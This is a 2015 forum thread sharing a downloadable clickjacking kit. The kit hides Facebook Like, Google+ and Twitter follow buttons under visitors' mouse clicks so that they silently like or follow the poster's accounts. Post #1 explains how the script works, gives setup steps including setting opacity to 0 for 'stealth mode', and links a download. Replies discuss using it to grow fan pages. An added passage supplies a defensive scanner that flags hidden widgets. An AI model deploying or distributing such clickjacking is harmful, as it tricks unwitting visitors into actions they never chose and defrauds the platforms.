[New Method] ClickJacking On Facebook, Twitter and Google Plus > Working 2015 !
2015-01-21, 12:45 AM,
#1
Hey guys,

After hearing some news that clickjacking is patched by Facebook and others, I made an extensive search and I found this code as a way to show how you might hide an embedded object into a website in order to execute a successful ClickJacking attack. This code will maliciously force the user, or the visitor, to silently ‘Like’ or +1 a particular page on Facebook or Google+, or add Twitter followers.

How the Code Works:

1. User visits the page -> jQuery script is executed
The script detects which social media sites the user is logged into (Facebook, Twitter, or Google+)
2. If the script detects a login from any of those sites, it will iterate down the list and pick the first of the logged in sites (for this example, let’s use Facebook)
3. Using HTML, CSS, and JavaScript/jQuery, a hidden button will be loaded and tied to the user’s mouse click event
4. When the mouse is clicked, the button will trigger and execute a particular function tied to Facebook, Twitter, or Google. In this case, the button is a ‘Like’, and the user has unknowingly liked a page on Facebook.
5. The script then unloads, and drops a cookie indicating that the Facebook script has been run
6. If the script has been placed in a website’s header, it will reload the next time the user visits a different page on the site. This time the script will detect the clickjack’s ‘Facebook complete’ cookie and automatically iterate to the next logged in service.


Live DEMOOO:

http://www.nightlionsecurity.com/scripts/cj/

Download Link:
[hide]
http://www42.zippyshare.com/v/Kyb4l33B/file.html

VirusTotal Scan Results:
https://www.virustotal.com/en/file/8c389...421774366/

Loool .. it is detected by Avast as ClickJack. A malware is in Exe, bat form. So don't worry, the zip contains only HTML and JS files!
[/hide]

Using the Code

1. Each of the social network functions has specific opacity settings. These are currently set to VISIBLE (1). If you would like to go into stealth mode and hide the buttons, change all the ‘opacity’ settings to 0 (I will eventually make this a global option).
2. You must specify your account in the parameters of each of the social networks. Replace all instances of “[YOURNAME]” with your account name.
3. Execution of the Facebook code requires a Facebook APP ID. The app ID you are using must have the same domain name as the script. This code is located in index.html
4. The login status messages can be safely removed from the HTML file without affecting the rest of the code.
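Added example (not part of this thread or of the archive linked in post #1): post #1 says the buttons disappear from view once their ‘opacity’ settings are changed to 0, and that same property is what a site owner or page scanner can look for. The Python sketch below flags iframes and social widgets that sit inside a near-transparent element; the widget class names, the 0.1 threshold and the sample HTML are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Class names the three networks' embed snippets commonly use (assumed here;
# the markup of the archive discussed in the thread is not shown on the page).
WIDGET_CLASSES = {"fb-like", "g-plusone", "twitter-follow-button"}
VOID_TAGS = {"img", "br", "hr", "input", "meta", "link", "embed", "source"}
OPACITY_RE = re.compile(r"(?:^|;)\s*opacity\s*:\s*([0-9]*\.?[0-9]+)")
THRESHOLD = 0.1  # assumed cut-off: anything fainter is effectively invisible

class HiddenWidgetScanner(HTMLParser):
    """Flag iframes and social widgets nested in a near-transparent element."""

    def __init__(self):
        super().__init__()
        self.stack = []     # effective opacity of every element still open
        self.findings = []  # (line number, tag, effective opacity)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        m = OPACITY_RE.search(attrs.get("style") or "")
        own = float(m.group(1)) if m else 1.0
        parent = self.stack[-1] if self.stack else 1.0
        effective = min(own, 1.0) * parent  # CSS opacity multiplies down the tree
        classes = set((attrs.get("class") or "").split())
        if (tag == "iframe" or classes & WIDGET_CLASSES) and effective < THRESHOLD:
            self.findings.append((self.getpos()[0], tag, effective))
        if tag not in VOID_TAGS:
            self.stack.append(effective)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

def scan(html):
    """Return the findings for one HTML document (inline styles only)."""
    scanner = HiddenWidgetScanner()
    scanner.feed(html)
    return scanner.findings

# Constructed sample: one visible widget, two hidden by a transparent wrapper.
SAMPLE = """<html><body>
<div class="fb-like" data-href="https://example.com/page"></div>
<div id="follower" style="position:absolute; opacity:0">
  <iframe src="https://example.com/widget"></iframe>
</div>
<div style="opacity: 0.05"><div class="g-plusone"></div></div>
</body></html>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

This only reads inline `style` attributes; opacity set from a stylesheet or by script at runtime needs a rendered-DOM check instead.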

2015-01-21, 05:02 AM,
#2
This works for Twitter? I tried your example, but it's not detecting my Twitter as logged in.

2015-01-21, 08:58 AM,
#3
My antivirus detects the demo site as a virus lol ...


2015-01-21, 09:48 AM,
#4
Thanks.. I will try it for my LP
2015-01-21, 10:13 AM,
#5
Yes, this is working. I've seen this also on other forum lately..
2015-01-21, 10:19 AM,
#6
The demo is detected by my antivirus, mate.

"In late repentance."

-xchanmolx
2015-01-21, 12:04 PM,
#7
I'm not sure why it is detected on your part but I scanned the test page for you guys..

https://www. virustotal. com/en/url/e1882d7195128f891fc86b38a8a24eaff8b3c5cab24d86429fc9117df5d967c4/analysis/1421818285/

(Please remove the space on the link)
2015-01-21, 12:11 PM,
#8
LOL this is sick, you can literally build a targeted fan page in no time with the right traffic, thank you very much
2015-01-21, 12:44 PM,
#9
What file should I upload to hosting?
2015-01-21, 01:13 PM,
#10
Same here. Live Demo is Detected as Virus. :D